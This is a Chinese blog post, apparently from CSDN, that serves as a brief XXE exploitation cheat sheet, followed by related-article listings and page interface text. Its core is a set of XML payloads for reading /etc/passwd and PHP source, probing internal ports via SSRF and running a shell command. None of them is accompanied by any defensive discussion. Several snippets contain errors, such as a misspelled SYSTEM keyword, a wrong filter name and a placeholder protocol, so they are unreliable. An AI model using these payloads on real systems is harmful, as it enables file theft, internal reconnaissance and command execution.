XXE漏洞

最新推荐文章于 2023-03-08 14:46:50 发布
最新推荐文章于 2023-03-08 14:46:50 发布
阅读量157 收藏
点赞数
分类专栏: Web Application漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41182861/article/details/108249915
版权

进行XXE漏洞测试时,必备知识:

XML声明:<?xml version="1.0" encoding="utf-8"?>
内部DTD声明:
外部实体声明:<!ENTITY 实体名称 SYSTRM ‘URI/URL’>

根据不同的环境,需要了解不同的协议,
如php支持的协议:file://、http://、ftp://、php://、zlib://、data://、glob://、phar://、ssh2://、rar://、ogg://、expect://

一、读取文件:
以PHP协议来构造我们的payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<c>&test;</c>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "php://filter/read=conver.base64-encode/resource=index.php">
]>
<c>&test;</c>

二、内网探测/简单的SSRF
使用http://来进行端口探测及简单的SSRF构造一个Payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1:3306">
]>
<c>&test;</c>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1:1.txt">
]>
<c>&test;</c>

三、命令执行
使用php协议构造一个payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "example://id">
]>
<c>&test;</c>

通过GET方式请求,需要先将payload先urlencode

info-sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透测试】XXE(外部实体注入):PHP_XXE解题简记
weixin_53972936的博客
10-26 1331
XXE漏洞发生在应用程序解析XML输入,并没有禁止外部实体的加载,当允许引用外部实体,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
xxe漏洞详解
scu_hacker博客
12-17 3663
本文详细描述了xxe漏洞的原理、利用方式、防御方法
[Vulhub] PHP环境 XML外部实体注入漏洞XXE
weixin_45605352的博客
05-07 3119
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
XXE漏洞详解
weixin_53440207的博客
03-08 616
xxe漏洞详解
xxe
r_deku的博客
11-19 274
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、xxe漏洞简介二、xxe漏洞利用1.实验一:有回显读本地敏感文件(Normal XXE)2.实验二:无回显读取本地敏感文件(Blind OOB XXE) 前言 认识XXE之前必学认识XML,XML 指可扩展标记语言(Extensible Markup Language) XML是用于 标记电子文件 使其具有 结构性 的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包
XXE漏洞常见利用点总结
记录学习,一起进步
02-02 901
XXE漏洞常见利用点总结
PHP协议-文件包含漏洞常用的伪协议
热门推荐
wangyuxiang946的博客
08-19 1万+
在实战中文件包含漏洞配合PHP的伪协议可以发挥重大的作用,比如读取文件源码,任意命令执行或者开启后门获取webshell等,常用的伪协议php://filter 读取文件源码 php://input 任意代码执行 data://text/plain 任意代码执行 zip:// 配合文件上传开启后门 下面拿ctf.show WEB模块的第3关举个栗子,这一关存在文件包含漏洞 php://filter php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件..
xxe漏洞利用
qq_50673174的博客
05-30 1488
XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2062
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
XXE漏洞基础知识
叶子的Blog
10-29 1170
XXE概述 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理引发的安全问题。 下面我们主要介绍PHP语言下的XXE攻击。 文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version="1.0"?> <!--文档类型定义--> <!DOCTYPE note [ <!--定义此文档是 note 类
XXE漏洞总结
ma963852的博客
05-27 914
搬运:未知攻焉知防——XXE漏洞攻防 - 博客 - 腾讯安全应急响应中心 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的元语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以再XML文档内部声明,也可以外部引用。 内部声明DTD <根元素[声明元素]> 引用外部DTD <根元素 SY
PHP代码审计之XXE(XML外部实体注入)
qq_22132931的博客
12-08 620
PHP代码审计之XXE(XML外部实体注入)
VB学生档案管理系统设计与实现.rar
最新发布
05-28
计算机专业毕业设计VB精品论文资源
geoserver xxe漏洞
09-02
XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值